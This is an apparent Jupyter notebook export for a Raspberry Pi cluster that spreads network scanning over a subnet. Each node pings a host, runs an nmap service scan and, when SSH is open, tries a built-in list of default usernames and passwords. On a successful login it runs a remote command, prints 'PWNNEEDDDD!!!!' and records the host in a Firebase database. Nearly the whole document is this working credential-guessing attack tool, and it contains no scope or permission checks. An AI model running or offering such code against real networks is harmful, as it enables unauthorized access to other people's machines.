#!/usr/bin/env python # coding: utf-8 # # Raspberry Pi Cluster Network Scanning # # Notebook for presentation purposes. # # ## `compute()` # This is the function that is being run on the invidividual nodes. For a more in depth look, please look at `SingleDemo.ipynb`. # In[1]: def compute(hostname): import os if (os.system("ping -c 1 -w 1 " + hostname)) == 0: valid = "alive" from libnmap.process import NmapProcess from libnmap.parser import NmapParser nmproc = NmapProcess(hostname, "-sV") rc = nmproc.run() parsed = NmapParser.parse(nmproc.stdout) host = parsed.hosts[0] services = [] status = "Unknown" cracked = False for serv in host.services: services.append(str(serv.port) + "/" + str(serv.service)) if serv.port == 22: import paramiko client = paramiko.client.SSHClient() client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.WarningPolicy) uid_list=["pi","odroid","root","admin"] pwd_list=["raspberry","odroid","root","admin","password"] for uid in uid_list: for pwd in pwd_list: try: if cracked == False: client.connect(hostname,username=uid,password=pwd) stdin, stdout, stderr = client.exec_command('ls -l') status = "Poor SSH Credentials" print("PWNNEEDDDD!!!!") cracked = True except: print("failed to pwn") status = "Unknown" client.close() import pyrebase config = { "apiKey": "", "authDomain": "clusterscanner.firebaseio.com", "databaseURL": "https://clusterscanner.firebaseio.com/", "storageBucket": "clusterscanner.appspot.com" } firebase = pyrebase.initialize_app(config) auth = firebase.auth() user = auth.sign_in_with_email_and_password("pi@cluster.pi", "") db = firebase.database() # reference to the database service hoststruct = hostname.split(".") data = {"hostname": hostname, "services": services, "status": status} results = db.child(hoststruct[0]).child(hoststruct[1]).child( hoststruct[2]).child(hoststruct[3]).set(data, user['idToken']) else: valid = "dead" return (hostname, valid) # ## Cluster # First we import 
# [dispy](http://dispy.sourceforge.net/), a Python framework for distributed
# computing.

# In[2]:


import dispy


# ### Setup worker nodes, cluster and monitoring tool

# In[3]:


# Link-local addresses of the worker Pis; ip_addr is this head node's own
# address, which the workers use to reach the scheduler.
workers = ['169.254.102.163', '169.254.116.199', '169.254.114.226', '169.254.156.34']
cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='169.254.148.126')

import dispy.httpd, time

# Web dashboard for watching the cluster while it works.
http_server = dispy.httpd.DispyHTTPServer(cluster)


# ### We can now prepare our jobs (range of IP address)
# After preparing our job, we give the cluster 2 seconds to make sure
# everything is initialised properly. Then we check the status of the cluster.

# In[4]:


jobs = []
# Candidate hostnames: 172.22.0.150 through 172.22.0.199.
test_range = ["172.22." + str(i) + "." + str(j)
              for i in range(0, 1)
              for j in range(150, 200)]
print("Testing " + str(len(test_range)) + " hostnames")
time.sleep(2)
cluster.print_status()


# ### Showtime!
# Let's set the cluster on our jobs.

# In[5]:


start = time.time()

# Fan the addresses out across the cluster, tagging each job with its index.
for idx, address in enumerate(test_range):
    job = cluster.submit(address)
    job.id = idx
    jobs.append(job)

# Collect results; calling job() blocks until that job has finished.
for job in jobs:
    try:
        hostname, valid = job()
        print(job.ip_addr + ": " + hostname + " is " + valid + ".")
    except Exception as e:
        print(str(job) + " failed: " + str(e))

end = time.time()
cluster.print_status()
http_server.shutdown()
cluster.close()

print("")
print("Total time taken = " + str(end - start))